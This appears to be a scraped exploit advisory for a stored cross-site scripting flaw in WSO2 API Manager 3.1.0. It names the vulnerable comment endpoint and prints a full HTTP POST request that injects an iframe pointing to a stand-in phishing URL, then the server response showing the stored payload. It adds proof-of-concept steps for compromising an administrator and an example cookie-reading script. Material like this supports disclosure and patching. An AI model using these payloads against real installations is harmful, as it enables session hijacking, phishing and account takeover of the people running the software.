扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting # Date: 2020-04-13 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A # Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Technical Details & Description: ================================ A remote Stored Cross Site Scripting has been discovered in WSO2 API Manager Ressource Browser component). The security vulnerability allows a remote attacker With access to the component "Ressource Browser" to inject a malicious code in Add Comment Feature. The vulnerability is triggered after sending a POST request to /carbon/info/comment-ajaxprocessor.jsp</code> with Parameter "comment=targeted&path=%2F". Remote attackers has the ablility to spread a malware,to Hijack a session (a session with Higher privileges), or to initiate phishing attacks. The security risk of the Stored XSS web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.4 Exploitation of the Stored XSS web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in Compromising the server . Request Method: [+] POST Module: [+] /carbon/info/comment-ajaxprocessor.jsp Parameters: [+] comment=admincomment [+] path=%2F ======================================= POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 Host: 192.168.149.1:9443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH Content-Length: 64 Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 Connection: close comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F ============================== HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY vary: accept-encoding Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Tue, 31 Dec 2019 10:50:00 GMT Connection: close Server: WSO2 Carbon Server Content-Length: 3144 //the body of response includes attacker malicious script <a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a> <iframe href=http://phishing_url> <br/> posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker Proof of Concept (PoC): ======================= //Let's suppose we're Attacking an admin with higher privileges 1-Attacker opens his account 2-add arbitrary comment 3-intercepts the request 4-add malicious script to the comment 5-admin access his account,he wants to add a comment,the malicious script got executed ===>Admin account compromised =============================================================================== Example malicious script : <script> alert(document.cookie); </script> =============================================================================== |
体验盒子
